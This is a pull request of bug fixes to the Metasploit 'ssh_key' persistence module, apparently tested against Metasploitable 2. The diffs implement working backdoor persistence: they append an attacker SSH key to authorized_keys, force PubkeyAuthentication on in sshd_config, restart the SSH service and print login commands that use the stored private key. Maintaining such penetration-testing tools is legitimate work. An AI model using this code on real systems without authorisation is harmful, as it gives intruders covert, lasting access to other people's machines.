### PR TITLE
ssh_key_persistence: Bug fixes

### DIFF
--- a/lib/msf/core/exploit/local/persistence.rb
+++ b/lib/msf/core/exploit/local/persistence.rb
@@ -58,7 +58,10 @@ module Msf
     end
 
     def save_cleanup_rc
-      host = session.sys.config.sysinfo['Computer']
+      # `session.sys.config.sysinfo` is meterpreter-only, as a result shell sessions do not have `session.sys.*`
+      # However `session_host` is available on all session types
+      host = session.type == 'meterpreter' ? session.sys.config.sysinfo['Computer'] : session.session_host
+
       # Create Filename info to be appended to downloaded files
       filenameinfo = '_' + ::Time.now.strftime('%Y%m%d.%M%S')
       logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))
@@ -69,7 +72,11 @@ module Msf
       clean_rc = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + '.rc'
       file_local_write(clean_rc, @clean_up_rc)
 
-      print_status("Meterpreter-compatible Cleanup RC file: #{clean_rc}")
+      if session.type == 'meterpreter'
+        print_status("Meterpreter-compatible Cleanup RC file: #{clean_rc}")
+      else
+        print_status("Clean-up reference file (not directly executable): #{clean_rc}")
+      end
 
       report_note(host: host,
                   type: 'host.persistance.cleanup',

--- a/lib/msf/core/exploit/local/persistence.rb
+++ b/lib/msf/core/exploit/local/persistence.rb
@@ -79,7 +79,7 @@ module Msf
       end
 
       report_note(host: host,
-                  type: 'host.persistance.cleanup',
+                  type: 'host.persistence.cleanup',
                   data: {
                     local_id: session.sid,
                     stype: session.type,

--- a/lib/msf/core/exploit/local/persistence.rb
+++ b/lib/msf/core/exploit/local/persistence.rb
@@ -3,7 +3,7 @@
 module Msf
   module Exploit::Local::Persistence
     def initialize(info = {})
-      @persistence_service = Rex::Sync::Event.new(auto_reset = false)
+      @persistence_service = Rex::Sync::Event.new(false)
       @clean_up_rc = ''
       super(
         update_info(
@@ -92,7 +92,6 @@ module Msf
                   })
     end
 
-    def cleanup
-    end
+    def cleanup; end
   end
 end

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Local
       key = SSHKey.generate(bits: 4096) # https://github.com/bensie/sshkey/issues/41
       our_pub_key = key.ssh_public_key
       private_key_path = store_loot('id_rsa', 'text/plain', session, key.private_key, 'ssh_id_rsa', 'OpenSSH Private Key File')
-      print_good("Storing new private key as #{private_key_path}. Change the permissions to 600 before using it")
+      print_status("Storing new private key as #{private_key_path}. Change the permissions to 600 before using it")
     else
       our_pub_key = ::File.read(datastore['PUBKEY'])
     end
@@ -161,10 +161,10 @@ class MetasploitModule < Msf::Exploit::Local
       print_status("Adding key to #{authorized_keys}")
       append_file(authorized_keys, "\n#{our_pub_key}")
       set_pub_key_file_permissions(authorized_keys)
-      print_good "Persistence installed! Call a shell using 'ssh -i #{private_key_path} <username>@#{session.session_host}'"
-      print_good 'use auxiliary/scanner/ssh/ssh_login'
-      print_good "  run KEY_PATH=#{private_key_path} RHOSTS=#{session.session_host} USERNAME=<username>"
+      print_good 'Persistence installed!'
       next unless datastore['PUBKEY'].nil?
+      print_status "  To get a ssh shell  : $ ssh -i #{private_key_path} <username>@#{session.session_host}"
+      print_status "  To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=#{private_key_path} USERNAME=<username> RHOSTS=#{session.session_host}'"
 
       path_array = path.split(sep)
       path_array.pop

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -75,6 +75,10 @@ class MetasploitModule < Msf::Exploit::Local
     deregister_options('PAYLOAD')
   end
 
+  def passive?
+    false
+  end
+
   def check
     return CheckCode::Safe('sshd_config file not found') unless file?(sshd_config_file)
 

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Local
     if session.type == 'meterpreter'
       @clean_up_rc << "upload #{loot_path} #{remote_path}\n"
     else
-      @clean_up_rc << "# Restore #{remote_path} — local backup: #{loot_path}\n"
+      @clean_up_rc << "# Restore #{remote_path} - local backup: #{loot_path}\n"
       print_status("Cleanup: restore #{remote_path} from local loot #{loot_path}")
     end
   end
@@ -333,8 +333,10 @@ class MetasploitModule < Msf::Exploit::Local
         print_warning("No .ssh folder found for #{d}, skipping...")
         false
       elsif !d_exists
-        if session.platform == 'windows'
+        if session.platform == 'windows' && session.type == 'meterpreter'
           session.fs.dir.mkdir(d)
+        elsif session.platform == 'windows'
+          cmd_exec("mkdir \"#{d}\"")
         else
           cmd_exec("mkdir -m 700 -p #{d}")
           cmd_exec("chown #{d.split(sep)[-2]}:#{d.split(sep)[-2]} #{d}")

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -241,7 +241,7 @@ class MetasploitModule < Msf::Exploit::Local
     else
       auth_key_file = ".ssh#{sep}authorized_keys"
     end
-    print_status("Authorized Keys File: #{auth_key_file}")
+    print_status("Authorized keys file (relative): #{auth_key_file}")
     auth_key_file
   end
 
@@ -280,9 +280,9 @@ class MetasploitModule < Msf::Exploit::Local
         print_error("User #{datastore['USERNAME']} not found")
       end
     else # assume *nix
-      user_profile = enum_user_directories.find { |profile| profile.split(sep)[1] == datastore['USERNAME'] }
+      user_profile = enum_user_directories.find { |profile| File.basename(profile) == datastore['USERNAME'] }
       if user_profile
-        paths = ["#{user_profile['ProfileDir']}#{sep}#{auth_key_folder}"]
+        paths = ["#{user_profile}#{sep}#{auth_key_folder}"]
       else
         print_error("User #{datastore['USERNAME']} not found")
       end

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -142,8 +142,6 @@ class MetasploitModule < Msf::Exploit::Local
     if datastore['PUBKEY'].nil?
       key = SSHKey.generate(bits: 4096) # https://github.com/bensie/sshkey/issues/41
       our_pub_key = key.ssh_public_key
-      private_key_path = store_loot('id_rsa', 'text/plain', session, key.private_key, 'ssh_id_rsa', 'OpenSSH Private Key File')
-      print_status("Storing new private key as #{private_key_path}. Change the permissions to 600 before using it")
     else
       our_pub_key = ::File.read(datastore['PUBKEY'])
     end
@@ -153,22 +151,28 @@ class MetasploitModule < Msf::Exploit::Local
       authorized_keys = "#{path}#{sep}#{auth_key_file}"
       next unless file?(authorized_keys)
 
+      print_status("Authorized Keys File: #{authorized_keys}")
+
+      user = path.split(sep)[-2]
+      vprint_status("User: #{user}")
+
       # make a backup of the authorized_keys file so we can add it to the restore rc
       auth_keys_backup = read_file(authorized_keys)
-      loot_path = store_loot('authorized_keys', 'text/plain', session, auth_keys_backup, 'authorized_keys', 'SSH Authorized Keys File')
+      loot_path = store_loot("ssh.authkey.#{user}", 'text/plain', session, auth_keys_backup, 'authorized_keys', "SSH Authorized Keys File (#{user})")
       cleanup_add_upload(loot_path, authorized_keys)
+
       # start exploiting
       print_status("Adding key to #{authorized_keys}")
       append_file(authorized_keys, "\n#{our_pub_key}")
       set_pub_key_file_permissions(authorized_keys)
-      print_good 'Persistence installed!'
+      print_good('Persistence installed!')
       next unless datastore['PUBKEY'].nil?
-      print_status "  To get a ssh shell  : $ ssh -i #{private_key_path} <username>@#{session.session_host}"
-      print_status "  To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=#{private_key_path} USERNAME=<username> RHOSTS=#{session.session_host}'"
 
-      path_array = path.split(sep)
-      path_array.pop
-      user = path_array.pop
+      private_key_path = store_loot("host.unix.ssh.#{user}_rsa_private", 'text/plain', session, key.private_key, 'ssh_id_rsa', 'OpenSSH Private Key File')
+      print_status("Storing new private key as #{private_key_path}. Change the permissions to 600 before using it")
+      print_status("  To get a ssh shell  : $ ssh -i #{private_key_path} #{user}@#{session.session_host}")
+      print_status("  To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=#{private_key_path} USERNAME=#{user} RHOSTS=#{session.session_host}'")
+
       credential_data = {
         origin_type: :session,
         session_id: session.db_record ? session.db_record.id : nil,
@@ -176,7 +180,11 @@ class MetasploitModule < Msf::Exploit::Local
         private_type: :ssh_key,
         private_data: key.private_key.to_s,
         username: user,
-        workspace_id: myworkspace_id
+        workspace_id: myworkspace_id,
+        address: session.session_host,
+        port: 22,
+        service_name: 'ssh',
+        protocol: 'tcp'
       }
 
       create_credential(credential_data)

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -48,7 +48,6 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'Automatic', {} ]
         ],
         'DefaultTarget' => 0,
-
         'Stance' => Msf::Exploit::Stance::Aggressive,
         'Passive' => false,
         'DefaultOptions' => {
@@ -296,7 +295,12 @@ class MetasploitModule < Msf::Exploit::Local
       if session.platform == 'windows'
         paths = ['C:\ProgramData\ssh']
       else # assume *nix
-        paths = ["/#{datastore['USERNAME']}/#{auth_key_folder}"]
+        user_profile = enum_user_directories.find { |profile| File.basename(profile) == datastore['USERNAME'] }
+        if user_profile
+          paths = ["#{user_profile}#{sep}#{auth_key_folder}"]
+        else
+          print_error("User #{datastore['USERNAME']} not found")
+        end
       end
     # specific user
     elsif session.platform == 'windows'

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -204,6 +204,7 @@ class MetasploitModule < Msf::Exploit::Local
         private_type: :ssh_key,
         private_data: key.private_key.to_s,
         username: user,
+        module_fullname: fullname,
         workspace_id: myworkspace_id,
         address: session.session_host,
         port: 22,

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def sshd_config_file
-    return datastore['SSHD_CONFIG'] if !datastore['SSHD_CONFIG'].nil? && datastore['SSHD_CONFIG'].empty?
+    return datastore['SSHD_CONFIG'] if datastore['SSHD_CONFIG'].present?
 
     if session.platform == 'windows'
       'C:\ProgramData\ssh\sshd_config'

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Passive' => false,
         'DefaultOptions' => {
           'DisablePayloadHandler' => true, # since this is non-traditional persistence in that it isn't traditional event driven
-          'PAYLOAD' => 'payload/generic/custom' # dummy payload to avoid issues
+          'PAYLOAD' => 'generic/custom' # dummy payload to avoid issues
         },
         'DisclosureDate' => '1995-07-01', # ssh first release
         'Notes' => {

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -102,6 +102,27 @@ class MetasploitModule < Msf::Exploit::Local
     !datastore['USERNAME'].nil? && ['root', 'administrator', 'admin'].include?(datastore['USERNAME'].downcase)
   end
 
+  def cleanup_add_upload(loot_path, remote_path)
+    if session.type == 'meterpreter'
+      @clean_up_rc << "upload #{loot_path} #{remote_path}\n"
+    else
+      @clean_up_rc << "# Restore #{remote_path} — local backup: #{loot_path}\n"
+      print_status("Cleanup: restore #{remote_path} from local loot #{loot_path}")
+    end
+  end
+
+  def cleanup_add_rmdir(path)
+    if session.type == 'meterpreter'
+      @clean_up_rc << "rmdir #{path}\n"
+    elsif session.platform == 'windows'
+      @clean_up_rc << "# Remove: rmdir /s /q \"#{path}\"\n"
+      print_status("Cleanup: remove #{path}")
+    else
+      @clean_up_rc << "# Remove: rm -rf #{path}\n"
+      print_status("Cleanup: remove #{path}")
+    end
+  end
+
   def set_pub_key_file_permissions(file, username = nil)
     if session.platform == 'windows'
       return unless target_admin_user?
@@ -141,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
       # make a backup of the authorized_keys file so we can add it to the restore rc
       auth_keys_backup = read_file(authorized_keys)
       loot_path = store_loot('authorized_keys', 'text/plain', session, auth_keys_backup, 'authorized_keys', 'SSH Authorized Keys File')
-      @clean_up_rc << "upload #{loot_path} #{authorized_keys}\n"
+      cleanup_add_upload(loot_path, authorized_keys)
       # start exploiting
       print_status("Adding key to #{authorized_keys}")
       append_file(authorized_keys, "\n#{our_pub_key}")
@@ -208,7 +229,7 @@ class MetasploitModule < Msf::Exploit::Local
   def enable_pub_key_auth(sshd_config)
     vprint_status('Attempting to enable pubkey authentication in sshd_config')
     loot_path = store_loot('sshd_config', 'text/plain', session, sshd_config, 'sshd_config', 'SSH Server Configuration')
-    @clean_up_rc << "upload #{loot_path} #{sshd_config_file}\n"
+    cleanup_add_upload(loot_path, sshd_config_file)
     sshd_config = sshd_config.sub(/^\s*#?\s*PubkeyAuthentication\s+.*/i, 'PubkeyAuthentication yes')
     write_file(sshd_config_file, sshd_config)
     if session.platform == 'windows'
@@ -318,7 +339,7 @@ class MetasploitModule < Msf::Exploit::Local
           cmd_exec("mkdir -m 700 -p #{d}")
           cmd_exec("chown #{d.split(sep)[-2]}:#{d.split(sep)[-2]} #{d}")
         end
-        @clean_up_rc << "rmdir #{d}\n"
+        cleanup_add_rmdir(d)
       end
 
       f_exists = file?(authorized_keys_path)
@@ -347,5 +368,4 @@ class MetasploitModule < Msf::Exploit::Local
 
     write_key(home_folders, auth_key_file, sep)
   end
-
 end

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -289,7 +289,7 @@ class MetasploitModule < Msf::Exploit::Local
       if session.platform == 'windows'
         paths = grab_user_profiles.map { |d| "#{d['ProfileDir']}#{sep}#{auth_key_folder}" }
       else # assume *nix
-        paths = enum_user_directories.map { |d| "#{d}#{sep}#{auth_key_folder}" }
+        paths = enum_user_directories.map { |d| "#{d.chomp('/')}#{sep}#{auth_key_folder}" }
       end
     # admin user
     elsif target_admin_user?

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -168,7 +168,17 @@ class MetasploitModule < Msf::Exploit::Local
       set_pub_key_file_permissions(authorized_keys)
 
       print_good('Persistence installed!')
-      next unless datastore['PUBKEY'].nil?
+
+      unless datastore['PUBKEY'].nil?
+        fingerprint = begin
+          blob = Base64.strict_decode64(our_pub_key.split[1])
+          "SHA256:#{Base64.strict_encode64(OpenSSL::Digest::SHA256.digest(blob)).delete('=')}"
+        rescue StandardError
+          nil
+        end
+        print_status("Installed key fingerprint: #{fingerprint}") if fingerprint
+        next
+      end
 
       # Consistency with: ./modules/auxiliary/scanner/ssh/ssh_key_login.rb, ./modules/exploits/multi/persistence/ssh_key.rb & ./modules/post/multi/gather/ssh_creds.rb
       key_fingerprint = begin

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -170,7 +170,21 @@ class MetasploitModule < Msf::Exploit::Local
       print_good('Persistence installed!')
       next unless datastore['PUBKEY'].nil?
 
-      private_key_path = store_loot("host.unix.ssh.#{user}_rsa_private", 'text/plain', session, key.private_key, 'ssh_id_rsa', 'OpenSSH Private Key File')
+      # Consistency with: ./modules/auxiliary/scanner/ssh/ssh_key_login.rb, ./modules/exploits/multi/persistence/ssh_key.rb & ./modules/post/multi/gather/ssh_creds.rb
+      key_fingerprint = begin
+        blob = Base64.strict_decode64(key.ssh_public_key.split[1])
+        "SHA256:#{Base64.strict_encode64(OpenSSL::Digest::SHA256.digest(blob)).delete('=')}"
+      rescue StandardError
+        "OpenSSH RSA private key for #{user}"
+      end
+      private_key_path = store_loot(
+        'ssh.privatekey.rsa',
+        'text/plain',
+        session,
+        key.private_key,
+        "#{user}_id_rsa",
+        key_fingerprint
+      )
       print_status("Storing new private key: #{private_key_path}. Change the permissions to 600 before using it.")
       print_status("  To get a ssh shell  : $ ssh -i #{private_key_path} #{user}@#{session.session_host}")
       print_status("  To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=#{private_key_path} USERNAME=#{user} RHOSTS=#{session.session_host}'")

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -200,9 +200,7 @@ class MetasploitModule < Msf::Exploit::Local
       print_status("  To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=#{private_key_path} USERNAME=#{user} RHOSTS=#{session.session_host}'")
 
       credential_data = {
-        origin_type: :session,
-        session_id: session.db_record ? session.db_record.id : nil,
-        post_reference_name: refname,
+        origin_type: :service,
         private_type: :ssh_key,
         private_data: key.private_key.to_s,
         username: user,

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -109,8 +109,8 @@ class MetasploitModule < Msf::Exploit::Local
     if session.type == 'meterpreter'
       @clean_up_rc << "upload #{loot_path} #{remote_path}\n"
     else
+      print_status("Clean-up: Restore #{remote_path} from local loot: #{loot_path}")
       @clean_up_rc << "# Restore #{remote_path} - local backup: #{loot_path}\n"
-      print_status("Cleanup: restore #{remote_path} from local loot #{loot_path}")
     end
   end
 
@@ -118,11 +118,11 @@ class MetasploitModule < Msf::Exploit::Local
     if session.type == 'meterpreter'
       @clean_up_rc << "rmdir #{path}\n"
     elsif session.platform == 'windows'
+      print_status("Clean-up: Remove #{path}")
       @clean_up_rc << "# Remove: rmdir /s /q \"#{path}\"\n"
-      print_status("Cleanup: remove #{path}")
     else
+      print_status("Clean-up: Remove #{path}")
       @clean_up_rc << "# Remove: rm -rf #{path}\n"
-      print_status("Cleanup: remove #{path}")
     end
   end
 
@@ -135,9 +135,7 @@ class MetasploitModule < Msf::Exploit::Local
       cmd_exec("icacls \"#{file}\" /grant BUILTIN\\Administrators:(F)")
     else
       chmod(file, 0o600)
-      unless username.nil?
-        cmd_exec("chown #{username}:#{username} #{file}")
-      end
+      cmd_exec("chown #{username}:#{username} #{file}") unless username.nil?
     end
   end
 
@@ -159,20 +157,21 @@ class MetasploitModule < Msf::Exploit::Local
       user = path.split(sep)[-2]
       vprint_status("User: #{user}")
 
-      # make a backup of the authorized_keys file so we can add it to the restore rc
+      # Make a backup of the authorized_keys file so we can add it to the restore rc
       auth_keys_backup = read_file(authorized_keys)
       loot_path = store_loot("ssh.authkey.#{user}", 'text/plain', session, auth_keys_backup, 'authorized_keys', "SSH Authorized Keys File (#{user})")
       cleanup_add_upload(loot_path, authorized_keys)
 
-      # start exploiting
-      print_status("Adding key to #{authorized_keys}")
+      # Start exploiting
+      print_status("Adding key to: #{authorized_keys}")
       append_file(authorized_keys, "\n#{our_pub_key}")
       set_pub_key_file_permissions(authorized_keys)
+
       print_good('Persistence installed!')
       next unless datastore['PUBKEY'].nil?
 
       private_key_path = store_loot("host.unix.ssh.#{user}_rsa_private", 'text/plain', session, key.private_key, 'ssh_id_rsa', 'OpenSSH Private Key File')
-      print_status("Storing new private key as #{private_key_path}. Change the permissions to 600 before using it")
+      print_status("Storing new private key: #{private_key_path}. Change the permissions to 600 before using it.")
       print_status("  To get a ssh shell  : $ ssh -i #{private_key_path} #{user}@#{session.session_host}")
       print_status("  To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=#{private_key_path} USERNAME=#{user} RHOSTS=#{session.session_host}'")
 
@@ -195,19 +194,19 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def pubkey_enabled?
-    print_status('Checking SSH Permissions')
-    if session.platform != 'windows' && !readable?(sshd_config_file)
-      return nil
-    end
+    print_status('Checking SSH permissions')
+    return nil if session.platform != 'windows' && !readable?(sshd_config_file)
 
     sshd_config = read_file(sshd_config_file)
-    return nil if sshd_config.nil? || sshd_config.empty? # should catch permission errors
+    return nil if sshd_config.nil? || sshd_config.empty? # Should catch permission errors
 
     if /^#?\s*PubkeyAuthentication\s+(?<pub_key>yes|no)/ =~ sshd_config
       # If the line exists, check if it's commented or explicitly "no"
       if sshd_config =~ /^#\s*PubkeyAuthentication/ || pub_key == 'no'
-        print_error('Pubkey Authentication disabled')
+        print_error('PubkeyAuthentication disabled')
+
         enable_pub_key_auth(sshd_config)
+
         if read_file(sshd_config_file) == sshd_config
           print_bad('Unable to reconfigure sshd_config to enable PubkeyAuthentication')
           return false
@@ -219,24 +218,26 @@ class MetasploitModule < Msf::Exploit::Local
       end
     else
       # No PubkeyAuthentication line found at all — treat as disabled
-      print_error('Pubkey Authentication not found, assuming disabled')
+      print_error('PubkeyAuthentication not found, assuming disabled')
+
       enable_pub_key_auth(sshd_config)
     end
 
-    # also check if the windows admin keys are enabled. See Testing Notes in markdown docs for more info
-    if session.platform == 'windows' && sshd_config !~ /^(\s*#)\s*(Match Group administrators|AuthorizedKeysFile)/ && !target_admin_user?
-      fail_with(Failure::BadConfig, "Admin AuthorizedKeysFile enabled, please 'set username admin' to use this module")
-    end
+    # Also check if the windows admin keys are enabled. See Testing Notes in markdown docs for more info
+    fail_with(Failure::BadConfig, "Admin AuthorizedKeysFile enabled, please 'set username admin' to use this module") if session.platform == 'windows' && sshd_config !~ /^(\s*#)\s*(Match Group administrators|AuthorizedKeysFile)/ && !target_admin_user?
 
     true
   end
 
   def enable_pub_key_auth(sshd_config)
     vprint_status('Attempting to enable pubkey authentication in sshd_config')
+
     loot_path = store_loot('sshd_config', 'text/plain', session, sshd_config, 'sshd_config', 'SSH Server Configuration')
     cleanup_add_upload(loot_path, sshd_config_file)
+
     sshd_config = sshd_config.sub(/^\s*#?\s*PubkeyAuthentication\s+.*/i, 'PubkeyAuthentication yes')
     write_file(sshd_config_file, sshd_config)
+
     if session.platform == 'windows'
       cmd_exec('net stop "OpenSSH SSH Server"')
       cmd_exec('net start "OpenSSH SSH Server"')
@@ -247,26 +248,24 @@ class MetasploitModule < Msf::Exploit::Local
 
   def authorized_keys_file
     print_status('Determining authorized_keys file')
-    if session.platform == 'windows' && target_admin_user?
-      return 'administrators_authorized_keys'
-    end
-    if session.platform != 'windows' && !readable?(sshd_config_file)
-      return nil
-    end
+    return 'administrators_authorized_keys' if session.platform == 'windows' && target_admin_user?
+
+    return nil if session.platform != 'windows' && !readable?(sshd_config_file)
 
     sshd_config = read_file(sshd_config_file)
     return nil if sshd_config.nil? || sshd_config.empty? # should catch permission errors. Prefer this over readable? since windows isn't supported
 
     %r{^AuthorizedKeysFile\s+(?<auth_key_file>[\w%/.]+)} =~ sshd_config
     if auth_key_file
-      auth_key_file = auth_key_file.gsub('%h', '')
-      auth_key_file = auth_key_file.gsub('%%', '%')
+      auth_key_file = auth_key_file.gsub('%h', '').gsub('%%', '%')
+
       if auth_key_file.start_with? '/'
         auth_key_file = auth_key_file[1..]
       end
     else
       auth_key_file = ".ssh#{sep}authorized_keys"
     end
+
     print_status("Authorized keys file (relative): #{auth_key_file}")
     auth_key_file
   end
@@ -283,41 +282,46 @@ class MetasploitModule < Msf::Exploit::Local
 
   def find_user_folders(auth_key_folder)
     paths = []
-    # all users
+
+    # All users
     if datastore['USERNAME'].nil?
       if session.platform == 'windows'
         paths = grab_user_profiles.map { |d| "#{d['ProfileDir']}#{sep}#{auth_key_folder}" }
       else # assume *nix
         paths = enum_user_directories.map { |d| "#{d.chomp('/')}#{sep}#{auth_key_folder}" }
       end
-    # admin user
+    # Admin user
     elsif target_admin_user?
       if session.platform == 'windows'
         paths = ['C:\ProgramData\ssh']
       else # assume *nix
         user_profile = enum_user_directories.find { |profile| File.basename(profile) == datastore['USERNAME'] }
+
         if user_profile
           paths = ["#{user_profile}#{sep}#{auth_key_folder}"]
         else
           print_error("User #{datastore['USERNAME']} not found")
         end
       end
-    # specific user
+    # Specific user
     elsif session.platform == 'windows'
       user_profile = grab_user_profiles.find { |profile| profile['UserName'] == datastore['USERNAME'] }
+
       if user_profile
         paths = ["#{user_profile['ProfileDir']}#{sep}#{auth_key_folder}"]
       else
         print_error("User #{datastore['USERNAME']} not found")
       end
-    else # assume *nix
+    else # Assume *nix
       user_profile = enum_user_directories.find { |profile| File.basename(profile) == datastore['USERNAME'] }
+
       if user_profile
         paths = ["#{user_profile}#{sep}#{auth_key_folder}"]
       else
         print_error("User #{datastore['USERNAME']} not found")
       end
     end
+
     paths.map! { |p| p.delete("\r\n") }
     paths
   end
@@ -325,16 +329,17 @@ class MetasploitModule < Msf::Exploit::Local
   def install_persistence
     auth_key_file = authorized_keys_file
     unless auth_key_file
-      print_warning('Unable to determine authorized_keys file due to permission issues, using default .ssh/authorized_keys')
       auth_key_file = ".ssh#{sep}authorized_keys"
+      print_warning("Unable to determine authorized_keys file due to permission issues, using default: #{auth_key_file}")
     end
-    # ironically windows default ssh config file has .ssh/authorized_keys so we can't trust the windows sep here
+
+    # Ironically windows default ssh config file has .ssh/authorized_keys so we can't trust the windows sep here
     auth_key_folder = auth_key_file.split(%r{[/\\]+}).reject(&:empty?)[0...-1].join(sep)
     auth_key_file = auth_key_file.split(%r{[/\\]+}).reject(&:empty?).last
     home_folders = find_user_folders(auth_key_folder)
     vprint_status("Found #{home_folders.length} potential user folders")
 
-    # double check all the folders and files exist that we need
+    # Double check all the folders and files exist that we need
     home_folders = home_folders.select do |d|
       authorized_keys_path = "#{d}#{sep}#{auth_key_file.split(sep).last}"
       d_exists = directory?(d)
@@ -351,6 +356,7 @@ class MetasploitModule < Msf::Exploit::Local
           cmd_exec("mkdir -m 700 -p #{d}")
           cmd_exec("chown #{d.split(sep)[-2]}:#{d.split(sep)[-2]} #{d}")
         end
+
         cleanup_add_rmdir(d)
       end
 
@@ -369,14 +375,13 @@ class MetasploitModule < Msf::Exploit::Local
           set_pub_key_file_permissions(authorized_keys_path, d.split(sep)[-2])
         end
       end
+
       true
     end
 
     vprint_status("Found #{home_folders.length} confirmed user folders")
 
-    if home_folders.nil? || home_folders.empty?
-      fail_with(Failure::NotFound, "No users found with a #{auth_key_file} directory. Try setting CREATESSHFOLDER to true.")
-    end
+    fail_with(Failure::NotFound, "No users found with a #{auth_key_file} directory. Try setting CREATESSHFOLDER to true.") if home_folders.nil? || home_folders.empty?
 
     write_key(home_folders, auth_key_file, sep)
   end

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -138,12 +138,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def windows_service_owner
-    service_info = cmd_exec('sc qc sshd')
-    /SERVICE_START_NAME\s+: (?<owner>.+)/ =~ service_info
-    owner
-  end
-
   def write_key(paths, auth_key_file, sep)
     if datastore['PUBKEY'].nil?
       key = SSHKey.generate(bits: 4096) # https://github.com/bensie/sshkey/issues/41

--- a/modules/exploits/multi/persistence/ssh_key.rb
+++ b/modules/exploits/multi/persistence/ssh_key.rb
@@ -127,9 +127,9 @@ class MetasploitModule < Msf::Exploit::Local
     if session.platform == 'windows'
       return unless target_admin_user?
 
-      cmd_exec("icacls #{file} /inheritance:r")
-      cmd_exec("icacls #{file} /grant SYSTEM:(F)")
-      cmd_exec("icacls #{file} /grant BUILTIN\\Administrators:(F)")
+      cmd_exec("icacls \"#{file}\" /inheritance:r")
+      cmd_exec("icacls \"#{file}\" /grant SYSTEM:(F)")
+      cmd_exec("icacls \"#{file}\" /grant BUILTIN\\Administrators:(F)")
     else
       chmod(file, 0o600)
       unless username.nil?


### PR DESCRIPTION
This PR helps to improve by doing:

- Various bug fixes
- Fix typos
- Tweak output
- Consistency with loot names

Target is Metasploitable 2.

```
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         2      2      3      0
After : *        default  1      1         2      2      4      1
```

_Note, this module uses the exploit/multi/ssh/sshexec module to get a session. However, its not using the PR I recently opened up improving it (Thats out of scope for this PR)._




## Before

- All testing was done using master branch
- Error as soon as you start to use the module
- Error running the module

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use exploit/multi/persistence/ssh_key;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:34079 -> 10.0.0.10:22) at 2026-05-27 00:02:41 +0100
[*] Session 1 created in the background.
[*] Using configured payload payload/generic/custom

Module options (exploit/multi/persistence/ssh_key):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   CREATESSHFOLDER  false            yes       If no .ssh folder is found, create it for the target user
   PUBKEY                            no        Path to Public Key File to use. (Default: Create a new one)
   SESSION                           yes       The session to run this module on
   SSHD_CONFIG                       no        sshd_config file
   USERNAME                          no        User to add SSH key to (Default: all users on box)

[-] Invalid payload defined: payload/generic/custom

msf exploit(multi/persistence/ssh_key) >
```

```console
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > run SESSION=1
[-] Exploit failed: You specified an invalid payload: payload/generic/custom
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > run SESSION=1 PAYLOAD=generic/custom
[*] Exploit running as background job 0.
msf exploit(multi/persistence/ssh_key) >
[!] SESSION may not be compatible with this module:
